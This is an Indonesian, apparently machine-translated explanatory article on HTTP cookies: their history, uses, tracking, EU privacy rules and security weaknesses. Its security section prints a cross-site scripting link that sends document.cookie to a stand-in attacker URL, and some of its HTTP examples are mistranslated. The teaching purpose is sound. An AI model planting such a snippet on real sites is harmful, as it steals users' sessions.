in ,

Cookie Internet: Apa itu? Definisi, Asal Usul, Jenis dan Privasi

Apa peran cookie, apa itu, dan apa saja jenis cookie? đŸȘ

Cookie Internet: Apa itu? Definisi, Asal Usul, Jenis dan Privasi
Cookie Internet: Apa itu? Definisi, Asal Usul, Jenis dan Privasi

Un cookie atau cookie web (Atau Kue kering, disingkat saksi di Quebec) didefinisikan oleh protokol komunikasi HTTP sebagai urutan informasi yang dikirim oleh server HTTP ke klien HTTP, yang kemudian dikembalikan setiap kali server HTTP yang sama ditanyakan dalam kondisi tertentu.

Cookie setara dengan a file teks kecil yang disimpan di terminal dari pengguna internet. Sudah ada selama lebih dari 20 tahun, mereka mengizinkan pengembang situs web untuk menyimpan data pengguna untuk memfasilitasi navigasi mereka dan mengizinkan fungsionalitas tertentu. Cookie selalu kurang lebih kontroversial karena mengandung sisa informasi pribadi yang berpotensi dieksploitasi oleh pihak ketiga.

Itu dikirim sebagai header HTTP oleh server web ke browser web yang mengembalikannya tidak berubah setiap kali mengakses server. Cookie dapat digunakan untuk sebuah otentikasi, satu sesi (pemeliharaan negara), dan untuk menyimpan informasi spesifik tentang pengguna, seperti preferensi situs atau konten keranjang belanja elektronik. Istilah cookie berasal dari kue ajaib, sebuah konsep terkenal dalam komputasi UNIX, yang mengilhami ide dan nama cookie browser. Ada beberapa alternatif untuk cookie, masing-masing dengan kegunaan, kelebihan dan kekurangannya sendiri.

Menjadi file teks sederhana, cookie tidak dapat dieksekusi. Mereka tidak bukan spyware atau virus, meskipun cookie dari beberapa situs terdeteksi oleh banyak perangkat lunak anti-virus karena memungkinkan pengguna untuk dilacak saat mereka mengunjungi beberapa situs. 

Sebagian besar browser modern memungkinkan pengguna untuk memutuskan apakah akan menerima atau menolak cookie. Pengguna juga bisa pilih berapa lama cookie disimpan. Namun, penolakan cookie sepenuhnya membuat beberapa situs tidak dapat digunakan. Misalnya, toko keranjang belanja atau situs yang memerlukan login menggunakan kredensial (nama pengguna dan kata sandi).

Daftar isi

historis

Istilah kue berasal dari istilah bahasa Inggris kue ajaib, yang merupakan paket data yang diterima dan dikembalikan oleh program tanpa perubahan. Cookie sudah digunakan di IT kapan Lou Montuli memiliki ide untuk menggunakannya dalam komunikasi web pada bulan Juni 1994. Saat itu, dia dipekerjakan oleh Netscape Communications, yang telah mengembangkan aplikasi e-commerce untuk klien. Cookie memberikan solusi untuk masalah keandalan implementasi keranjang belanja virtual toko.

John Giannandrea dan Lou Montulli menulis spesifikasi cookie pertama Netscape pada tahun yang sama. Versi 0.9 beta dari Mosaic Netscape, dirilis pada 13 Oktober 1994, terintegrasi teknologi kue (lihat postingan). Penggunaan cookie pertama (non-eksperimental) adalah untuk menentukan apakah pengunjung situs web Netscape pernah mengunjungi situs tersebut sebelumnya. Montulli mengajukan permohonan paten untuk teknologi cookie pada tahun 1995, dan paten AS 5774670 diberikan. diberikan pada tahun 1998.

Setelah diimplementasikan di Netscape 0.9 beta pada tahun 1994, cookie diintegrasikan ke dalam Internet Explorer 2, dirilis pada Oktober 1995.

Pengenalan cookies memang belum banyak diketahui masyarakat. Secara khusus, cookie diterima secara default di pengaturan browser, dan pengguna tidak diberi tahu tentang keberadaannya. Beberapa orang menyadari keberadaan cookie sekitar kuartal pertama tahun 1995, namun masyarakat umum baru mengetahui keberadaannya setelah Financial Times menerbitkan sebuah artikel pada tanggal 12 Februari 1996. Pada tahun yang sama, cookie mendapat banyak perhatian media. karena kemungkinan gangguan privasi. Topik tentang cookie dibahas dalam dua konsultasi Komisi Perdagangan Federal Amerika pada tahun 1996 dan 1997.

Pengembangan spesifikasi cookie resmi sudah berlangsung. Diskusi pertama tentang spesifikasi resmi berlangsung pada bulan April 1995 di milis www-talk. Sebuah kelompok kerja khusus IETF dibentuk. Dua proposal alternatif untuk memperkenalkan status ke transaksi HTTP diusulkan oleh Brian Behlendorf dan David Kristol, tetapi kelompok tersebut, yang dipimpin oleh Kristol sendiri, memutuskan untuk menggunakan spesifikasi Netscape sebagai titik awal. Pada bulan Februari 1996, kelompok kerja menetapkan bahwa cookie pihak ketiga merupakan ancaman signifikan terhadap privasi. Spesifikasi yang dihasilkan oleh grup tersebut akhirnya dipublikasikan sebagai RFC 2109.

Sejak akhir tahun 2014, kami melihat spanduk tentang cookie di banyak situs. Setidaknya ada satu ekstensi browser yang memungkinkan spanduk tidak ditampilkan.

Jenis Cookie dan Penggunaannya

Manajemen sesi

Cookie dapat digunakan untuk memelihara data pengguna selama navigasi, tetapi juga di beberapa kunjungan. Cookie diperkenalkan untuk menyediakan sarana penerapan keranjang belanja elektronik, perangkat virtual tempat pengguna dapat mengumpulkan barang yang ingin dibelinya saat menjelajahi situs.

Saat ini, aplikasi seperti kereta belanja malah menyimpan daftar item dalam database di server, yang lebih disukai; daripada menyimpannya di cookie itu sendiri. Server web mengirimkan cookie yang berisi ID sesi unik. Browser web kemudian mengembalikan ID sesi ini pada setiap permintaan berikutnya dan item dalam keranjang disimpan dan dikaitkan dengan ID sesi unik yang sama ini.

Penggunaan cookie yang sering berguna untuk masuk ke situs menggunakan kredensial. Singkatnya, server web pertama kali mengirimkan cookie yang berisi ID sesi unik. Kemudian pengguna memberikan kredensial mereka (biasanya nama pengguna dan kata sandi). Aplikasi web kemudian mengotentikasi sesi dan mengizinkan pengguna untuk mengakses layanan.

personalisasi

Cookie dapat digunakan untuk mengingat informasi tentang pengguna situs, untuk menunjukkan kepadanya konten yang sesuai di masa mendatang. Misalnya, server web dapat mengirimkan cookie yang berisi nama pengguna terakhir yang digunakan untuk masuk ke situs web tersebut, sehingga nama pengguna dapat diisi sebelumnya pada kunjungan berikutnya.

Banyak situs web menggunakan cookie untuk personalisasi berdasarkan preferensi pengguna. Pengguna memilih preferensi mereka dalam formulir dan mengirimkannya ke server. Server mengkodekan preferensi dalam cookie dan mengirimkannya kembali ke browser. Selanjutnya, setiap kali pengguna mengakses halaman situs ini, browser mengembalikan cookie dan daftar preferensi; server kemudian dapat menyesuaikan halaman sesuai dengan preferensi pengguna. Misalnya, situs web Wikipedia mengizinkan penggunanya untuk memilih tampilan situs yang mereka sukai. Mesin pencari Google mengizinkan penggunanya (bahkan jika mereka tidak terdaftar) untuk memilih jumlah hasil yang ingin mereka lihat di setiap halaman hasil.

Pelacakan

Cookie pelacakan digunakan untuk melacak kebiasaan menjelajah pengguna internet. Ini juga dapat dilakukan sebagian dengan menggunakan alamat IP komputer yang membuat permintaan untuk halaman atau dengan menggunakan tajuk HTTP 'perujuk' yang dikirim klien dengan setiap permintaan, tetapi cookie memungkinkan ketepatan yang lebih tinggi. Hal ini dapat dilakukan seperti pada contoh berikut:

  1. Jika pengguna membuka halaman di situs, dan permintaan tidak berisi cookie, server menganggap bahwa ini adalah halaman pertama yang dikunjungi pengguna. Server kemudian membuat string acak dan mengirimkannya ke browser bersama dengan halaman yang diminta.
  2. Mulai saat ini, cookie akan dikirim secara otomatis oleh browser setiap kali halaman baru situs dipanggil. Server akan mengirimkan halaman seperti biasa, tetapi juga akan mencatat URL halaman yang dipanggil, tanggal, waktu permintaan, dan cookie dalam file log.

Dengan melihat file log, maka dimungkinkan untuk melihat halaman mana yang telah dikunjungi pengguna dan dalam urutan apa. Misalnya, jika file berisi beberapa permintaan yang dibuat menggunakan cookie id=abc, ini dapat menetapkan bahwa semua permintaan ini berasal dari pengguna yang sama. URL yang diminta, tanggal dan waktu yang terkait dengan permintaan memungkinkan penjelajahan pengguna dilacak.

Cookie pihak ketiga dan suar web, yang dijelaskan di bawah, juga mengaktifkan pelacakan di berbagai situs. Pelacakan situs tunggal umumnya digunakan untuk tujuan statistik. Sebaliknya, pelacakan di berbagai situs menggunakan cookie pihak ketiga umumnya digunakan oleh perusahaan periklanan untuk menghasilkan profil pengguna anonim (yang kemudian digunakan untuk menentukan iklan mana yang harus ditampilkan kepada pengguna serta mengiriminya email yang sesuai dengan iklan ini — SPAM ).

Pelacakan cookie adalah risiko pelanggaran privasi pengguna tetapi dapat dengan mudah dihapus. Sebagian besar browser modern menyertakan opsi untuk secara otomatis menghapus cookie persisten saat menutup aplikasi.

Cookie pihak ketiga

Gambar dan objek lain yang terdapat dalam halaman web mungkin berada di server yang berbeda dari server yang menghosting halaman tersebut. Untuk menampilkan halaman, browser mengunduh semua objek ini. Sebagian besar situs web berisi informasi dari berbagai sumber. Misalnya, jika Anda mengetik www.example.com di browser, sering kali terdapat objek atau iklan di bagian halaman yang berasal dari sumber berbeda, yaitu dari domain yang berbeda dari www. .example.com. Cookie pihak "pertama" adalah cookie yang disetel oleh domain yang tercantum di bilah alamat browser. Cookie pihak ketiga disetel oleh salah satu objek halaman yang berasal dari domain berbeda.

Secara default, browser seperti Mozilla Firefox, Microsoft Internet Explorer, dan Opera menerima cookie pihak ketiga, tetapi pengguna dapat mengubah pengaturan di opsi browser untuk memblokirnya. Tidak ada risiko keamanan yang melekat pada cookie pihak ketiga yang mengaktifkan fungsionalitas web, namun cookie juga digunakan untuk melacak pengguna. dari situs ke situs.

Alat seperti Ghostery yang tersedia untuk semua browser termasuk Google Chrome dapat memblokir pertukaran antara pihak ketiga.

Penerapan

Kemungkinan interaksi antara browser web dan server yang menghosting halaman web. Server mengirimkan cookie ke browser dan browser mengirimkannya kembali saat memanggil halaman lain.
Kemungkinan interaksi antara browser web dan server yang menghosting halaman web. Server mengirimkan cookie ke browser dan browser mengirimkannya kembali saat memanggil halaman lain.

Cookie adalah bagian kecil dari data yang dikirim oleh server web ke browser. Browser mengembalikannya tidak berubah ke server, memasukkan status (memori peristiwa masa lalu) ke dalam transaksi HTTP yang tidak memiliki kewarganegaraan. Tanpa cookie, setiap pengambilan halaman web atau komponen halaman web merupakan peristiwa yang terisolasi, terlepas dari permintaan lain yang dibuat ke situs yang sama. Selain dapat diatur oleh server web, cookie juga dapat diatur dengan bahasa skrip seperti JavaScript, jika didukung dan diotorisasi oleh browser.

Spesifikasi cookie resmi menunjukkan bahwa browser harus dapat menyimpan dan mengirim ulang cookie dalam jumlah minimum. Secara khusus, browser harus dapat menyimpan setidaknya 300 cookie masing-masing empat kilobyte, dan setidaknya 20 cookie untuk satu server atau domain.

Menurut bagian 3.1 dari RFC 2965, nama cookie tidak peka huruf besar-kecil.

Cookie dapat menentukan tanggal kedaluwarsanya, dalam hal ini cookie akan dihapus pada tanggal tersebut. Jika cookie tidak menentukan tanggal kedaluwarsa, cookie akan dihapus segera setelah pengguna meninggalkan browsernya. Oleh karena itu, menentukan tanggal kedaluwarsa adalah cara untuk membuat cookie bertahan melalui beberapa sesi. Untuk alasan ini, cookie dengan tanggal kedaluwarsa dikatakan demikian gigih. Contoh aplikasi: situs retail mungkin menggunakan cookie persisten untuk mencatat item yang telah ditempatkan pengguna di keranjang belanja mereka (pada kenyataannya, cookie mungkin merujuk ke entri yang disimpan di database di situs penjualan, dan bukan di komputer Anda) . Melalui cara ini, jika pengguna meninggalkan browser mereka tanpa melakukan pembelian dan kembali lagi nanti, mereka akan dapat menemukan item di keranjang lagi. Jika cookie ini tidak memberikan tanggal kedaluwarsa, cookie akan kedaluwarsa saat browser ditutup, dan informasi tentang isi keranjang akan hilang.

Cookie dapat dibatasi cakupannya ke domain, subdomain, atau jalur tertentu di server yang membuatnya.

Transfer halaman web dilakukan menggunakan HyperText Transfer Protocol (HTTP). Dengan mengabaikan cookie, browser memanggil halaman dari server web dengan mengirimi mereka teks singkat yang disebut permintaan HTTP. Misalnya, untuk mengakses halaman www.example.org/index.html, browser terhubung ke server www.example.org dan mengirimkan permintaan yang terlihat seperti ini:

DAPATKAN /index.html HTTP/1.1Host: www.example.org
navigator→Serveur

Server merespons dengan mengirimkan halaman yang diminta, didahului dengan teks yang mirip, keseluruhan dipanggil Respons HTTP. Paket ini mungkin berisi baris-baris yang menginstruksikan browser untuk menyimpan cookie:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(halaman HTML)
navigator←Serveur

Server hanya mengirimkan baris Set-Cookie, jika server ingin browser menyimpan cookie. Set-Cookie adalah permintaan browser untuk menyimpan string name=value dan mengembalikannya di semua permintaan mendatang ke server. Jika browser mendukung cookie dan cookie diaktifkan di opsi browser, cookie akan disertakan dalam semua permintaan selanjutnya yang dibuat ke server yang sama. Misalnya, browser memanggil halaman www.example.org/news.html dengan mengirimkan permintaan berikut ke server www.example.org:

DAPATKAN /news.html HTTP/1.1Host: www.example.orgCookie: nama=nilaiTerima: */*
navigator→Serveur

Ini adalah permintaan untuk halaman lain dari server yang sama, dan berbeda dari yang pertama di atas karena berisi string yang sebelumnya dikirimkan server ke browser. Berkat sarana ini, server mengetahui bahwa permintaan ini ditautkan ke permintaan sebelumnya. Server merespons dengan mengirimkan halaman yang dipanggil, dan juga dengan menambahkan cookie lain ke dalamnya.

Nilai cookie dapat diubah oleh server dengan mengirimkan baris baru Set-Cookie: name=new_value sebagai respons terhadap halaman yang dipanggil. Browser kemudian mengganti nilai lama dengan yang baru.

Baris Set-Cookie biasanya dibuat oleh program CGI atau bahasa skrip lainnya, bukan oleh server HTTP. Server HTTP (contoh: Apache) hanya akan mengirimkan hasil program (dokumen yang didahului dengan header yang berisi cookie) ke browser.

Cookie juga dapat diatur oleh JavaScript atau bahasa serupa lainnya yang berjalan di browser, yaitu di sisi klien, bukan di sisi server. Dalam JavaScript, objek document.cookie digunakan untuk tujuan ini. Misalnya, pernyataan document.cookie = "temperature=20" membuat cookie bernama "temperature" dan dengan nilai 20.

Contoh respons HTTP dari google.com, yang menyetel cookie dengan atribut.
Contoh respons HTTP dari google.com, yang menyetel cookie dengan atribut.

Selain pasangan nama/nilai, cookie juga dapat berisi tanggal kedaluwarsa, jalur, nama domain, dan jenis koneksi yang dimaksud, yaitu normal atau terenkripsi. RFC 2965 juga menetapkan bahwa cookie harus memiliki nomor versi wajib, tetapi ini umumnya dihilangkan. Bagian data ini mengikuti pasangan name=new_value dan dipisahkan oleh titik koma. Misalnya, cookie dapat dibuat oleh server dengan mengirimkan baris Set-Cookie: name=new_value; kedaluwarsa=tanggal; jalur=/; domain=.contoh.org.

Cookie kedaluwarsa dan kemudian tidak dikirim oleh browser ke server dalam situasi berikut:

  • Saat browser ditutup, jika cookie tidak persisten.
  • Ketika tanggal kedaluwarsa cookie telah berlalu.
  • Saat tanggal kedaluwarsa cookie diubah (oleh server atau skrip) ke tanggal di masa lalu.
  • Saat browser menghapus cookie atas permintaan pengguna.

Situasi ketiga memungkinkan server atau skrip untuk menghapus cookie secara eksplisit. Perhatikan bahwa browser web Google Chrome dapat mengetahui tanggal kedaluwarsa cookie tertentu dengan mengakses pengaturan konten. Cookie yang disimpan di komputer mungkin tetap ada di sana selama beberapa dekade jika tidak ada prosedur yang diambil untuk menghapusnya.

Stereotip

Sejak diperkenalkan di Internet, banyak gagasan tentang cookie telah beredar di Internet dan di media. Pada tahun 1998, CIAC, tim pemantauan insiden komputer Departemen Energi Amerika Serikat, menentukan bahwa kerentanan keamanan cookie "pada dasarnya tidak ada" dan menjelaskan bahwa "informasi tentang asal kunjungan Anda dan detail halaman web yang telah Anda kunjungi sudah ada di file log server web”. Pada tahun 2005, Jupiter Research menerbitkan hasil penelitian, di mana persentase responden yang signifikan mempertimbangkan pernyataan berikut:

  • Cookie itu seperti virus, mereka menginfeksi hard drive pengguna.
  • Cookie menghasilkan pop-up.
  • Cookie digunakan untuk mengirim Spam.
  • Cookie hanya digunakan untuk iklan.

Cookie tidak dapat menghapus atau membaca informasi dari komputer pengguna. Namun, cookie memungkinkan untuk mendeteksi halaman web yang dikunjungi oleh pengguna di situs atau kumpulan situs tertentu. Informasi ini dapat dikumpulkan dalam profil pengguna yang dapat digunakan atau dijual kembali kepada pihak ketiga, yang dapat menimbulkan masalah privasi yang serius. Beberapa profil bersifat anonim, dalam arti tidak mengandung informasi pribadi, namun profil semacam itu pun dapat dipertanyakan.

Menurut penelitian yang sama, sebagian besar pengguna Internet tidak tahu cara menghapus cookie. Salah satu alasan orang tidak mempercayai cookie adalah karena beberapa situs telah menyalahgunakan aspek pengidentifikasian pribadi cookie dan membagikan informasi ini dengan sumber lain. Sebagian besar iklan bertarget dan email yang tidak diinginkan, yang dianggap sebagai spam, berasal dari informasi yang diperoleh dari cookie pelacakan.

Pengaturan peramban

Sebagian besar browser mendukung cookie dan mengizinkan pengguna untuk menonaktifkannya. Opsi yang paling umum adalah:

  • Aktifkan atau nonaktifkan cookie sepenuhnya, sehingga selalu diterima atau diblokir.
  • Izinkan pengguna untuk melihat cookie aktif di halaman tertentu, dengan memasukkan javascript: alert(document.cookie) di bilah alamat browser. Beberapa browser menyertakan pengelola cookie untuk pengguna yang dapat melihat dan menghapus cookie yang saat ini disimpan oleh browser secara selektif.

Sebagian besar browser juga mengizinkan penghapusan penuh data pribadi yang mencakup cookie. Modul tambahan untuk mengontrol izin cookie juga ada.

Privasi dan Cookie Pihak Ketiga

Dalam contoh fiktif ini, sebuah perusahaan periklanan memasang spanduk di dua situs web. Dengan menghosting spanduk di servernya dan menggunakan cookie pihak ketiga, perusahaan periklanan dapat melacak navigasi pengguna melalui kedua situs ini.

Cookie memiliki implikasi penting untuk privasi dan anonimitas pengguna web. Meskipun cookie hanya dikirim kembali ke server yang mengaturnya atau ke server milik domain Internet yang sama, halaman web mungkin berisi gambar atau komponen lain yang disimpan di server milik domain lain. Cookie yang disetel selama pemulihan komponen eksternal ini disebut cookie pihak ketiga. Ini termasuk cookie dari jendela pop-up yang tidak diinginkan.

Perusahaan periklanan menggunakan cookie pihak ketiga untuk melacak pengguna di berbagai situs yang mereka kunjungi. Secara khusus, perusahaan periklanan dapat melacak pengguna di semua halaman tempat ia menempatkan gambar iklan atau piksel pelacakan. Pengetahuan tentang halaman yang dikunjungi pengguna memungkinkan perusahaan periklanan untuk menargetkan preferensi periklanan pengguna.

Kemampuan untuk membuat profil pengguna dianggap oleh beberapa orang sebagai pelanggaran privasi, terutama saat pelacakan dilakukan di berbagai domain menggunakan cookie pihak ketiga. Untuk alasan ini, beberapa negara memiliki undang-undang cookie.

Pemerintah Amerika Serikat menerapkan peraturan ketat tentang penempatan cookie pada tahun 2000, setelah terungkap bahwa Kantor Kebijakan Narkoba Gedung Putih menggunakan cookie untuk melacak komputer pengguna yang melihat iklan narkoba online. Pada tahun 2002, aktivis privasi Daniel Brandt menemukan bahwa CIA meninggalkan kuki tetap di komputer yang telah mengunjungi situs webnya. Setelah diberitahu tentang pelanggaran ini, CIA menyatakan bahwa cookie ini tidak dikirim dengan sengaja dan berhenti mengaturnya. Pada tanggal 25 Desember 2005, Brandt menemukan bahwa National Security Agency (NSA) telah meninggalkan dua kuki tetap di komputer pengunjung karena pembaruan perangkat lunak. Setelah diberi tahu, NSA langsung menonaktifkan cookie.

Di Inggris Raya, the Hukum kue “, mulai berlaku pada tanggal 25 Mei 2012, mewajibkan situs untuk menyatakan niat mereka, sehingga memungkinkan pengguna untuk memilih apakah mereka ingin meninggalkan jejak atau tidak dari perjalanan mereka di Internet. Dengan demikian mereka dapat dilindungi dari penargetan iklan. Namun, berdasarkan Penjaga, persetujuan pengguna Internet tidak harus eksplisit; perubahan telah dilakukan pada ketentuan persetujuan pengguna, membuatnya demikian tersirat.

Petunjuk 2002/58 tentang privasi

Direktif 202/58 privasi dan komunikasi elektronik, berisi aturan penggunaan cookie. Secara khusus, pasal 5, paragraf 3 arahan ini mensyaratkan penyimpanan data (seperti cookie) di komputer pengguna hanya dapat dilakukan jika:

  • pengguna diberitahu tentang bagaimana data digunakan;
  • pengguna diberikan pilihan untuk menolak operasi penyimpanan ini. Namun, pasal ini juga menyatakan bahwa penyimpanan data karena alasan teknis dikecualikan dari undang-undang ini.

Karena akan diterapkan mulai Oktober 2003, arahan itu hanya dipraktikkan dengan sangat tidak sempurna menurut laporan Desember 2004, yang juga menunjukkan bahwa beberapa Negara Anggota (Slovakia, Latvia, Yunani, Belgia, dan Luksemburg) belum mengubah petunjuk ke dalam hukum domestik.

Menurut pendapat G29 pada tahun 2010, arahan ini, yang terutama mengkondisikan penggunaan cookie untuk tujuan iklan perilaku, atas persetujuan eksplisit dari pengguna Internet tetap diterapkan dengan sangat buruk. Faktanya, sebagian besar situs melakukannya dengan cara yang tidak sesuai dengan arahan, dengan membatasi diri pada "spanduk" sederhana yang menginformasikan penggunaan "kuki" tanpa memberikan informasi tentang penggunaan, tanpa membedakan antara kuki "teknis". cookie "pelacakan", atau untuk menawarkan pilihan nyata kepada pengguna yang ingin mempertahankan cookie teknis (seperti cookie manajemen keranjang belanja) dan menolak cookie "pelacakan". Faktanya, banyak situs tidak berfungsi dengan benar jika cookie ditolak, yang tidak sesuai dengan arahan 2002/58 atau arahan 95/46 (Perlindungan data pribadi).

Petunjuk 2009 / 136 / CE

Materi ini telah diperbarui oleh Directive 2009/136/EC tanggal 25 November 2009 yang menyatakan bahwa "penyimpanan informasi, atau memperoleh akses ke informasi yang telah disimpan, dalam perangkat terminal pelanggan atau pengguna hanya diperbolehkan dengan syarat bahwa pelanggan atau pengguna telah memberikan persetujuannya, setelah menerima, sesuai dengan Directive 95/46/EC, informasi yang jelas dan lengkap, antara lain untuk tujuan pemrosesan”. Oleh karena itu, arahan baru tersebut memperkuat kewajiban sebelum menempatkan cookie di komputer pengguna Internet.

Namun, dalam pertimbangan awal dari arahan tersebut, legislator Eropa menentukan: "Jika memungkinkan secara teknis dan efektif, sesuai dengan ketentuan yang relevan dari Directive 95/46/EC, persetujuan pengguna sehubungan dengan pemrosesan dapat dinyatakan melalui penggunaan pengaturan browser atau aplikasi lain yang sesuai”. Namun pada kenyataannya, hingga saat ini tidak ada browser yang memungkinkan untuk memisahkan cookie teknis penting dari cookie opsional yang harus diserahkan kepada pilihan pengguna.

Arahan baru ini diubah oleh anggota parlemen Belgia pada Juli 2012. Sebuah studi tahun 2014 menunjukkan bahwa bahkan anggota parlemen kesulitan untuk mengajukan kendala direktif.

P3P

Spesifikasi P3P mencakup kemampuan server untuk menyatakan kebijakan privasi, yang menentukan jenis informasi apa yang dikumpulkannya dan untuk tujuan apa. Kebijakan ini mencakup (namun tidak terbatas pada) penggunaan informasi yang dikumpulkan menggunakan cookie. Menurut definisi P3P, browser dapat menerima atau menolak cookie dengan membandingkan kebijakan privasi dengan preferensi pengguna atau dengan bertanya kepada pengguna, menyajikan pernyataan privasi kebijakan privasi yang dinyatakan oleh server.

Banyak browser, termasuk Apple Safari dan Microsoft Internet Explorer versi 6 dan 7, mendukung P3P yang memungkinkan browser menentukan apakah akan menerima penyimpanan cookie pihak ketiga. Browser Opera memungkinkan pengguna untuk menolak cookie pihak ketiga dan membuat profil keamanan global dan khusus untuk domain Internet. Mozilla Firefox versi 2 menghentikan dukungan P3P tetapi mengembalikannya di versi 3.

Cookie pihak ketiga dapat diblokir oleh sebagian besar browser untuk meningkatkan privasi dan mengurangi pelacakan iklan, tanpa memengaruhi pengalaman web pengguna secara negatif. Banyak biro iklan menawarkan opsi menyisih untuk iklan bertarget, dengan menyiapkan cookie generik di browser yang menonaktifkan penargetan ini, tetapi solusi semacam itu praktis tidak efektif, jika diterapkan, karena cookie generik ini dihapus segera setelah pengguna menghapus cookie ini yang membatalkan pilihan. keputusan keluar.

Kekurangan cookie

Selain masalah privasi, cookie juga memiliki beberapa kelemahan teknis. Secara khusus, mereka tidak selalu secara akurat mengidentifikasi pengguna, mereka dapat memperlambat kinerja situs ketika dalam jumlah besar, mereka dapat digunakan untuk serangan keamanan, dan mereka bertentangan dengan transfer status perwakilan, gaya arsitektur perangkat lunak.

Identifikasi yang tidak tepat

Jika lebih dari satu browser digunakan di komputer, di masing-masing browser selalu ada unit penyimpanan terpisah untuk cookie. Oleh karena itu, cookie tidak mengidentifikasi seseorang, tetapi kombinasi dari akun pengguna, komputer, dan browser web. Dengan demikian, siapa pun dapat menggunakan akun, komputer, atau browser ini yang memiliki banyak cookie. Demikian pula, cookie tidak membedakan antara banyak pengguna yang berbagi akun pengguna, komputer, dan browser yang sama, seperti di “kafe internet” atau tempat mana pun yang memberikan akses gratis ke sumber daya komputer.

Namun dalam praktiknya, pernyataan ini ternyata keliru di sebagian besar kasus karena saat ini komputer "pribadi" (atau smartphone, atau tablet, yang lebih buruk lagi) digunakan terutama oleh satu orang. Ini berarti menargetkan orang tertentu dan melalui volume informasi yang dikumpulkan sampai pada penargetan yang dipersonalisasi bahkan jika orang tersebut tidak “disebutkan” diidentifikasi.

Cookie dapat dicuri oleh komputer lain di jaringan.

Selama pengoperasian normal, cookie dikirim kembali antara server (atau sekelompok server dalam domain yang sama) dan browser komputer pengguna. Karena cookie dapat berisi informasi sensitif (nama pengguna, kata sandi yang digunakan untuk otentikasi, dll.), Nilainya tidak boleh diakses oleh komputer lain. Pencurian cookie adalah tindakan penyadapan cookie oleh pihak ketiga yang tidak berwenang.

Cookie dapat dicuri melalui packet sniffer dalam serangan yang disebut pembajakan sesi. Lalu lintas di internet dapat dicegat dan dibaca oleh komputer selain yang mengirim dan menerima (terutama pada ruang Wi-Fi publik yang tidak terenkripsi). Lalu lintas ini mencakup cookie yang dikirim melalui sesi menggunakan protokol HTTP biasa. Ketika lalu lintas jaringan tidak dienkripsi, pengguna jahat dapat membaca komunikasi pengguna lain di jaringan menggunakan "packet sniffer".

Masalah ini dapat diatasi dengan mengenkripsi koneksi antara komputer pengguna dan server menggunakan protokol HTTPS. Server dapat menentukan a bendera aman saat mengatur cookie; browser hanya akan mengirimkannya melalui jalur aman, seperti koneksi SSL.

Namun banyak situs, meskipun menggunakan komunikasi terenkripsi HTTPS untuk otentikasi pengguna (yaitu halaman login), kemudian mengirimkan cookie sesi dan data lainnya seperti biasa, melalui koneksi HTTP yang tidak terenkripsi untuk alasan efisiensi. Penyerang dengan demikian dapat mencegat cookie pengguna lain dan menyamar sebagai mereka di situs yang sesuai atau menggunakannya dalam serangan cookie.

Pembuatan skrip di situs: cookie yang seharusnya hanya dipertukarkan antara server dan klien dikirim ke pihak ketiga lainnya.

Cara lain untuk mencuri cookie adalah dengan membuat skrip situs dan meminta browser itu sendiri mengirimkan cookie ke server jahat yang tidak pernah menerimanya. Browser modern memungkinkan eksekusi bagian kode yang dicari dari server. Jika cookie diakses selama runtime, nilainya dapat dikomunikasikan dalam beberapa bentuk ke server yang seharusnya tidak mengaksesnya. Mengenkripsi cookie sebelum dikirim melalui jaringan tidak membantu menggagalkan serangan.

Jenis skrip dalam situs ini biasanya digunakan oleh penyerang di situs yang memungkinkan pengguna memposting konten HTML. Dengan mengintegrasikan bagian dari kode yang kompatibel dalam kontribusi HTML, penyerang dapat menerima cookie dari pengguna lain. Pengetahuan tentang cookie ini dapat digunakan dengan menghubungkan ke situs yang sama menggunakan cookie yang dicuri, sehingga dikenali sebagai pengguna yang cookie-nya dicuri.

Salah satu cara untuk mencegah serangan tersebut adalah dengan menggunakan bendera HttpOnly; itu adalah opsi, diperkenalkan sejak versi 6 Internet Explorer di PHP sejak versi 5.2.0 yang direncanakan membuat cookie tidak dapat diakses oleh klien yang dekat dengan skrip. Namun, pengembang web harus mempertimbangkan hal ini dalam pengembangan situs mereka sehingga mereka kebal terhadap skrip di situs tersebut.

Ancaman keamanan lain yang digunakan adalah fabrikasi permintaan di situs.

Spesifikasi teknis resmi memungkinkan cookie dikirim kembali hanya ke server di domain asalnya. Namun, nilai cookie dapat dikirim ke server lain menggunakan cara selain cookie header.

Secara khusus, bahasa skrip seperti JavaScript umumnya diizinkan untuk mengakses nilai cookie dan mampu mengirimkan nilai arbitrer ke server mana pun di Internet. Kemampuan skrip ini digunakan dari situs web yang memungkinkan pengguna memposting konten HTML untuk dilihat pengguna lain.

Misalnya, penyerang yang beroperasi di domain example.com mungkin memposting komentar yang berisi tautan berikut yang menunjuk ke blog populer yang tidak mereka kontrol:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Ketika pengguna lain mengklik link ini, browser mengeksekusi bagian atribut onclick dari kode, sehingga string document.cookie diganti dengan daftar cookie pengguna yang aktif untuk halaman ini. Oleh karena itu, daftar cookie ini dikirim ke server example.com, dan oleh karena itu penyerang dapat mengumpulkan cookie dari pengguna ini.

Jenis serangan ini sulit dideteksi di sisi pengguna karena skrip berasal dari domain yang sama yang mengatur cookie, dan operasi untuk mengirimkan nilai tampaknya diotorisasi oleh domain tersebut. Dianggap sebagai tanggung jawab administrator yang mengoperasikan situs jenis ini untuk memberlakukan batasan yang mencegah publikasi kode berbahaya.

Cookie tidak langsung terlihat oleh program sisi klien seperti JavaScript jika dikirim dengan bendera HttpOnly. Dari sudut pandang server, satu-satunya perbedaan adalah bahwa di baris header Set-Cookie ditambahkan bidang baru yang berisi string HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Saat browser menerima cookie seperti itu, browser seharusnya menggunakannya secara normal dalam pertukaran HTTP berikut, tetapi tanpa membuatnya terlihat oleh skrip yang dieksekusi di sisi klien. Bendera HttpOnly bukan bagian dari spesifikasi teknis resmi, dan tidak diterapkan di semua browser. Perhatikan bahwa saat ini tidak ada cara untuk mencegah pembacaan dan penulisan cookie sesi dengan metode XMLHTTPRequest.

Modifikasi konten: penyerang mengirimkan cookie yang tidak valid ke server, kemungkinan dibuat dari cookie valid yang dikirim oleh server.

